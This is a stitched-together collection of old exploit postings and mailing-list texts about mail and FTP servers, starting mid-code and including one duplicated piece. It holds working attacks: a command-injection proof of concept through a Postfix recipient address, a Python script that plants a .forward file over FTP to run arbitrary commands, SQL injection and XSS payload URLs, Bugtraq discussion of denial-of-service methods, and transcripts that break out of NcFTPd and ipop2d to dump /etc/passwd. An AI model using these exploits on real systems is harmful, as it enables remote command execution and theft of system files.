#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
                rv = pthread_mutex_lock(&popen_mutex);
                if (rv)
                {
                        debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
                        abort();
                }
#endif

                p = popen(buf, "r");        [1]
                if (!p)
                {
                        debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));
                        assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

#!python
# (C) 2007 kcope production

from ftplib import FTP
import sys
import socket

print "Sendmail/Postfix FORWARD Remote Exploit"
print "kcope/2007 - hey alex,andi"

if (len(sys.argv) != 4):
  print "usage: skyline.py <hostname> <ftp username> <ftp password>"
  sys.exit()

hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

print "[+] INITIAL FTP STOR"

def FTPconnect(initial):
  try:
    ftp = FTP(hostname)
    print ftp.getwelcome()
    ftp.login(username, password)
    if (initial):
      f = open(".forward", "wb")
      f.write("|touch /tmp/XXX\n")
      f.close()
    f = open(".forward", "rb")
    ftp.storbinary("STOR .forward", f)
    ftp.quit()
    f.close()
  except:
    print "[-] FTP Error. Correct Login Credentials ?"
    sys.exit()

FTPconnect(True)

print "[+] PLEASE ENTER COMMANDS TO EXECUTE"
print "[+] sendmail allows a single command"
print "[+] postfix allows many"
print "[+] END WITH . IN A SINGLE LINE"

input = sys.stdin.readline().strip()

f = open(".forward", "wb")
f.writelines("|" + "\"" + input + "> ~/RESULTS" + "\"" + "\n")

while (True):
  input = sys.stdin.readline().strip()
  if (input == "."): break
  f.writelines("|" + "\"" + input + ">> ~/RESULTS" + "\"" + "\n")

f.close()

print "[+] FTP STOR"
FTPconnect(False)

print "[+] EXPLOITING BOX"

try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((hostname, 25))
  smtpline = s.recv(1024)
  smtphostname = smtpline[4:smtpline.find(" ", 5)]
  s.close()
except:
  print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
  sys.exit()

try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((hostname, 25))
  smtpline = s.recv(1024)
  print smtpline
  s.send("HELO eyecandy\r\n")
  s.recv(1024)
  s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n")
  s.recv(1024)
  s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n")
  s.recv(1024)
  s.send("DATA" + "\r\n")
  s.recv(1024)
  s.send("." + "\r\n")
  s.recv(1024)
  s.send("quit" + "\r\n")
  s.recv(1024)
  s.close()
except:
  print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
  sys.exit()

print "[+] RETRIEVING RESULTS"

try:
  ftp = FTP(hostname)
  print ftp.getwelcome()
  ftp.login(username, password)
  ftp.retrlines("RETR RESULTS")
  ftp.delete("RESULTS")
except:
  print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ?"
  sys.exit()

for line in open("RESULTS"):
  print line

f.close()

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah ， saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
  initDB();
  echo "<div class=\"rdisplay\">\n";
  $query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
  $result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&amp;title=[SQLi]&amp;prefix=&amp;preparation=&amp;postfix=&amp;tipp=&amp;ingredient=
#p0c
In searchrecipe.php
  $title = $_GET['title'];
  $prefix = $_GET['prefix'];
  $preparation = $_GET['preparation'];
  $postfix = $_GET['postfix'];
  $tipp = $_GET['tipp'];
  $ingredient = $_GET['ingredient'];
  .
  .
  .
  if ($title != "") {
    $sstring = "a.title LIKE '%$title%' ";
  }
  .
  .
  searchRecipe($mode, $sstring);
  .
  .
  In Function SearchRecipe
        $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
    if ($sstring != "") {
      searchRecipe(0, $sstring);
.
.
.
  $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&amp;title=<script>alert('hi');</script>&amp;prefix=&amp;preparation=&amp;postfix=&amp;tipp=&amp;ingredient=


#Independent Pakistani Security Researcher

Date: Mon, 4 Jan 1999 00:04:09 -0500
From: Wietse Venema <wietse@PORCUPINE.ORG>
To: BUGTRAQ@netspace.org
Subject: Anonymous Qmail Denial of Service

In recent postings, Daniel Bernstein expands on the insecurity of
the Postfix world-writable directory for local mail submission.
Of all the attacks possible with such a scheme, one attack would
result in mail not being delivered.  That is of course unacceptable.

After my request for input from the Bugtraq membership I received
much useful feedback. Many suggestions were made for implementing
a private rendez-vous between unrelated, untrusting processes.  I
will try write up a summary of the responses.

I am grateful for all suggestions for improvements that were made,
in particular for one suggestion made by Daniel Bernstein himself,
in this same forum:

    Why doesn't [Postfix] use a protected queue, and a setuid
    program to add mail to the queue with guaranteed user
    identification?

Postfix uses a set-gid program and a mode 0770 submission directory,
and it does so for a very good reason.  Why doesn't Postfix use a
set-uid program, as suggested? The reason is that contrary to Daniel
Bernsteins's claim, a set-uid posting program cannot guarantee user
identification. I will illustrate this misconception with an example.

qmail uses a set-uid posting program, called qmail-queue.  When
this program is invoked, it opens a queue file somewhere below
/var/qmail/queue. For example:

    -rw-r--r--  1 qmailq  qmail       0 Dec 31 17:02 queue/mess/21/674956

What happens when the qmail-queue process is signaled with, say,
SIGKILL? The file will stay in the queue. That's a zero-length
file, owned by qmail, without any user identification whatsoever.

Each time a user does something like:

    % /var/qmail/bin/qmail-queue
    ^Z
    Suspended
    % kill -9 %1
    [1]    Killed                 /var/qmail/bin/qmail-queue
    %

There will be one more zero-length file, owned by qmail, without
any user identification whatsoever.  It is an exercise for the
reader to write a small program that automates the process:

    fork a child
    child: execute /var/qmail/bin/qmail-queue
    parent: wait briefly and SIGKILL the child

When this sequence is executed a sufficient number of times, the
queue file system runs out of available resources.  No-one can send
mail. No-one can receive mail. And no-one can be held responsible.

I fully agree with Daniel Bernstein that every mail system, be it
Postfix or qmail or anything else, should be able to add mail to
the queue with guaranteed user identification. I am grateful for
reminding me of this very important and very desirable property.

The lack of user identification as described above was verified on
BSD/OS 2.1, BSD/OS 3.1, and FreeBSD 2.1.1. It is reasonable to
expect that the same behavior exists on other BSD systems/versions.

When the same tests are run on Solaris 2.6, RedHat 5.0, and on
SunOS 4.1.3_U1, the only difference is in the queue file group
ownership attributes:

    -rw-r--r--   1 qmailq   users          0 Dec 31 18:10 queue/mess/1/418325

What can be done about this lack of accountability? On non-BSD
systems, the hole can be worked around by placing every user in a
different group, so that a malicious user can be recognized by the
queue file group ownership.  That will not close the hole on BSD
systems, however. For this reason, the preferable solution is to
close the hole by changing qmail. For this I suggest the use of a
set-gid posting program, similar to the one that is used in Postfix.

        Wietse

-----------------------------------------------------------------------------

Date: Mon, 4 Jan 1999 10:39:13 -0500
From: Illuminatus Primus <vermont@GATE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Anonymous Qmail Denial of Service

On Mon, 4 Jan 1999, Wietse Venema wrote:

> What happens when the qmail-queue process is signaled with, say,
> SIGKILL? The file will stay in the queue. That's a zero-length
> file, owned by qmail, without any user identification whatsoever.

Signals are one of the many gateways between setid processes that
programmers can easily forget about.  An easy remedy for the signal
problem is to log the real uid on startup and then set it to the effective
uid before doing anything important.  This is probably what ping had to do
to fix the SIGALRM ping flood exploit.

In my opinion, though, the "preferable solution" is to not do setgid and
be happy that the ownership of the 0 byte files can be traced.  As you've
said yourself, set[ug]id offers too many avenues for exploitation.  The
supposed tightening of Postfix's security by using a setgid queue helper
seems to be unclean to me.  Will Postfix's queue daemon behave correctly
when queue files can be dropped in half-written (SIGKILL to the setgid
queue helper while its writing)?  Will the queue daemon behave correctly
if a queue file is left locked indefinetly (SIGSTOP or SIGKILL, depending
on how the lock is made)?  The only clear advantage you have over
Bernstein's method is that the first interaction with the queue atomically
logs the caller's uid.

I think it is far easier to implement secure enforcement of policy when
the privilege levels are more clearly separated than in setid.  Sending
the data through sockets is one way to accomplish this.  Check out userv:
http://www.chiark.greenend.org.uk/~ian/userv/

I'm sure implementing something similar that allows portable
authentication of uids wouldn't be that hard - I can think of several
schemes right now.

Date: Tue, 5 Jan 1999 22:41:44 -0000
From: D. J. Bernstein <djb@CR.YP.TO>
To: BUGTRAQ@netspace.org
Subject: Re: Anonymous Qmail Denial of Service

News flash: There are dozens of denial-of-service attacks on every MTA.

Example: Any Internet user can create a continuing torrent of mail from
random Internet addresses to wietse@porcupine.org. A few basic methods:

   * Send lots of messages to mailinglistmanager@whatever with a return
     path and From line of wietse@porcupine.org. Automated responses
     will go back to wietse@porcupine.org.

   * Send lots of messages to legitimateuser@whatever with a return
     path of wietse@porcupine.org. After the legitimateuser mailbox
     fills up, messages will bounce to wietse@porcupine.org, in some
     cases with a delay.

   * Relay lots of messages through MTAs with spam-friendly defaults.
     For example, postfix allows relaying from the local network. If a
     postfix system is dialing into an ISP as (say) 18.25.0.221, and
     you're dialing in as (say) 18.25.0.37, then you can queue messages
     on that system for wietse@porcupine.org.

   * Subscribe wietse@porcupine.org to an automated mailing list. The
     majordomo 1.* cookie mechanism doesn't stop this attack; it isn't
     cryptographically secure. (Several students in my cryptography
     class two years ago were able to break it, under time pressure, as
     an extra-credit problem on the midterm.)

Thousands of these attacks, producing millions of messages, can be
carried out in a matter of minutes. The porcupine.org (postfix) SMTP
server and mail queue will be flooded, making it practically impossible
for legitimate mail to get through. You can easily remain anonymous, for
example by abusing the student Internet terminals at MIT.

As another example, here's a denial-of-service attack on postfix:

   Connect to the SMTP server at 127.0.0.1 and inject a mail message.
   Repeat ad nauseam.

Most MTAs are able to log the user responsible (by contacting port 113
and dropping unidentified connections); postfix doesn't even try.


Okay, okay, I admit that this isn't news. Here's what I said in the
qmail documentation, starting with the first release three years ago:

   There are lots of interesting remote denial-of-service attacks on any
   mail system. A long-term solution is to insist on prepayment for
   unauthorized resource use. The tricky technical problem is to make
   the prepayment enforcement mechanism cheaper than the expected cost
   of the attacks.

Denial-of-service attacks have always been excluded from the qmail
security guarantee (http://pobox.com/~djb/qmail/guarantee.html). They
are present in every MTA, widely documented, and very difficult to fix.


On the bright side, mailers are _not_ permitted to discard messages for
frivolous reasons such as full disks. They have to report the problem to
the sender, so that the sender can keep the message and try again later.

This isn't just common sense. It's also in RFC 1123, Host Requirements,
section 5.3.3, Reliable Mail Receipt:

   When the receiver-SMTP accepts a piece of mail (by sending a "250 OK"
   message in response to DATA), it is accepting responsibility for
   delivering or relaying the message.  It must take this responsibility
   seriously, i.e., it MUST NOT lose the message for frivolous reasons,
   e.g., because the host later crashes or because of a predictable
   resource shortage.

I'm keeping a list of mail clients that do not handle failures properly;
see http://pobox.com/~djb/docs/maildisasters/queueloss.html. Please let
me know if you have any additions to the list.


This thread began when Venema claimed that it was impossible to track a
user who fills up qmail's queue by repeatedly running and killing
qmail-queue.

Venema's claim is false. Every inode created this way requires a new
qmail-queue process. The process is visible in the standard UNIX process
list while it is running, and with an X entry in the standard UNIX acct
mechanism after it has been killed; either way, the user is identified.
X entries are sometimes created by legitimate users, but not in the
volume that would be required to fill up the mail queue. Occasional Xs
are not sufficient to carry out this attack, since each inode is
automatically removed by qmail-clean after an appropriate delay.

Venema further claims that ``a set-uid posting program cannot guarantee
user identification.'' That claim is false. The user id is provided by
the standard UNIX getuid() system call.

See http://pobox.com/~djb/qmail/venema.html for comments on Venema's
previous denial-of-service accusations.


For the record, nothing here should be interpreted as advocating the
setuid/setgid concept. As I wrote in the qmail documentation in 1995:

   A setuid program must operate in a very dangerous environment: a user
   is under complete control of its fds, args, environ, cwd, tty, rlimits,
   timers, signals, and more. Even worse, the list of controlled items
   varies from one vendor's UNIX to the next, so it is very difficult to
   write portable code that cleans up everything.

   Of the six most recent sendmail security holes, three worked only
   because the entire sendmail system is setuid.

But my conclusion was merely to be very, very careful: ``Do as little as
possible in setuid programs.'' The alternatives, such as world-writable
directories, are horrendous. We'll be stuck with setuid and setgid until
UNIX develops a simple, portable, reliable, secure IPC mechanism.

---Dan

NcFTPd <= 2.8.5 remote jail breakout

Discovered by:
	Kingcope
	Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
	27th July 2009

Greetings:
	Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
	Valid user account.
	
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+on freebsd you can symlink directories like ´/´

Cheerio,

Kingcope

# milw0rm.com [2009-07-27]

NcFTPd <= 2.8.5 remote jail breakout

Discovered by:
  Kingcope
  Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
  27th July 2009

Greetings:
  Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
  Valid user account.

Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &amp;:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &amp;:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &amp;:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+on freebsd you can symlink directories like ´/´

Cheerio,

Kingcope

While working to port ipop2d exploit to java discovered another hole in
the FOLD command of ipop2d...  The ability to read files that are
readable via the pop2d userid. Attached is a ported exploit in java for
bnc... as well as the pop2d exploit transcript.

-d0tslash
#b10z EFnet
#9x EFnet


[mandark@mandark mandark]$ telnet localhost 109
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
+ POP2 localhost.localdomain v4.46 server ready
helo mandark PASSHERE
#1 messages in /var/spool/mail/mandark
read 1
=389 characters in message 1
retr
Return-Path: <root@mandark.jumpline.com>
Received: (from root@localhost)
        by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
        for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
Date: Fri, 14 Jul 2000 12:28:07 -0400
From: root <root@mandark.jumpline.com>
Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com>
To: mandark@mandark.jumpline.com
Status: RO

fuckme

acks
=0 No more messages
fold /etc/passwd
#1 messages in /etc/passwd
read 1
=1178 characters in message 1
retr
Date: Thu, 13 Jul 2000 16:50:07 -0400
From: root@mandark.jumpline.com
Subject: /etc/passwd
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
postfix:x:101:104:postfix:/var/spool/postfix:
gdm:x:0:0::/home/gdm:/bin/bash
mandark:x:500:503::/home/mandark:/bin/bash
godie:x:0:0::/home/godie:/bin/bash
mp3:x:501:506::/mp3:/bin/bash
chefo:x:502:507::/home/chefo:/bin/bash
crunch:x:503:508::/home/crunch:/bin/bash
gsx:x:505:510::/home/gsx:/bin/csh
matt:x:506:511::/home/matt:/bin/bash
lyw0d:x:507:512::/home/lyw0d:/bin/bash